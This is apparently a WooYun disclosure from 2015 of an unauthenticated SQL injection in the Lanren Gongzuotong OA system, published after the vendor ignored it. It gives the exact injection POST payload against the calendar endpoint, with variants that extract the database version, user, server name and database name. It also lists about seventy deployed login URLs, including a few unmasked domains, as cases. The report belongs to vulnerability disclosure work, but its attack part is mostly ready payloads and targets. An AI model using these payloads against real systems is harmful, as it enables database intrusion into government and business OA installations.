当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165590

漏洞标题:懒人工作通OA系统无需登录SQL注入#影响大量政企OA系统(附众多案例)

相关厂商:岳阳云创信息科技有限公司

漏洞作者: 路人甲

提交时间:2015-12-29 11:23

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

oa影响大

详细说明:

官方:http://**.**.**.**/
懒人工作通协同管理系统是适用于企事业单位的通用型网络办公软件,融合了云创科技长期从事管理软件开发的丰富经验与先进技术,该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限制。

0.jpg


SQL Injection:(注入发生在我的日程中)

/Manage/CalendarMemo/load.ashx
POST:
emf='/**/and/**/@@version<0)/**/--31%2020091120%2F20160104%200&ctz=Asia%2FShanghai&hl=zh_CN&lef=31&secid=XzB6zTFMc6XNcnCn-AlrnWsP3Z4


Case:

http://**.**.**.**/Manage/login.aspx  官方Demo
http://**.**.**.**:99//Manage/login.aspx
http://**.**.**.**:8000/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
**.**.**.**/Manage/login.aspx
http://**.**.**.**:8888/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
**.**.**.**:51888/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**//Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://xn--6oqx0ho4ik0k.xn--fiqs8s/Manage/login.aspx
http://www.70701.top//Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**//Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**:8864/Manage/login.aspx
**.**.**.**:3900/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
https://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**//Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
**.**.**.**//Manage/login.aspx
**.**.**.**:801//Manage/login.aspx
http://**.**.**.**//Manage/login.aspx
http://**.**.**.**//Manage/login.aspx
http://**.**.**.**//Manage/login.aspx
http://**.**.**.**//Manage/login.aspx
http://**.**.**.**//Manage/login.aspx
http://**.**.**.**//Manage/login.aspx
http://**.**.**.**:81/Manage/login.aspx
http://**.**.**.**//Manage/login.aspx
**.**.**.**:86/Manage/login.aspx
http://**.**.**.**//Manage/login.aspx
**.**.**.**:83//Manage/login.aspx
**.**.**.**:20134/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**//Manage/login.aspx
http://www.**.**.**.**//Manage/login.aspx
**.**.**.**//Manage/login.aspx
http://**.**.**.**//Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**:8088//Manage/login.aspx
http://**.**.**.**/Manage/login.aspx
http://**.**.**.**//Manage/login.aspx
http://**.**.**.**//Manage/login.aspx

漏洞证明:

Security Testing:

1、http://**.**.**.**/Manage/CalendarMemo/load.ashx
POST:emf='/**/and/**/@@version<0)/**/--31%2020091120%2F20160104%200&ctz=Asia%2FShanghai&hl=zh_CN&lef=31&secid=XzB6zTFMc6XNcnCn-AlrnWsP3Z4

01.jpg


2、http://**.**.**.**:99//Manage/CalendarMemo/load.ashx
POST:emf='/**/and/**/@@version<0)/**/--31%2020091120%2F20160104%200&ctz=Asia%2FShanghai&hl=zh_CN&lef=31&secid=XzB6zTFMc6XNcnCn-AlrnWsP3Z4

02.jpg


3、http://**.**.**.**:8000/Manage/CalendarMemo/load.ashx
POST:emf='/**/and/**/USER<0)/**/--31%2020091120%2F20160104%200&ctz=Asia%2FShanghai&hl=zh_CN&lef=31&secid=XzB6zTFMc6XNcnCn-AlrnWsP3Z4

03.jpg


4、http://**.**.**.**/Manage/CalendarMemo/load.ashx
POST:emf='/**/and/**/@@servername<0)/**/--31%2020091120%2F20160104%200&ctz=Asia%2FShanghai&hl=zh_CN&lef=31&secid=XzB6zTFMc6XNcnCn-AlrnWsP3Z4

04.jpg


5、**.**.**.**/Manage/CalendarMemo/load.ashx
POST:emf='/**/and/**/db_name()<0)/**/--31%2020091120%2F20160104%200&ctz=Asia%2FShanghai&hl=zh_CN&lef=31&secid=XzB6zTFMc6XNcnCn-AlrnWsP3Z4

06.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝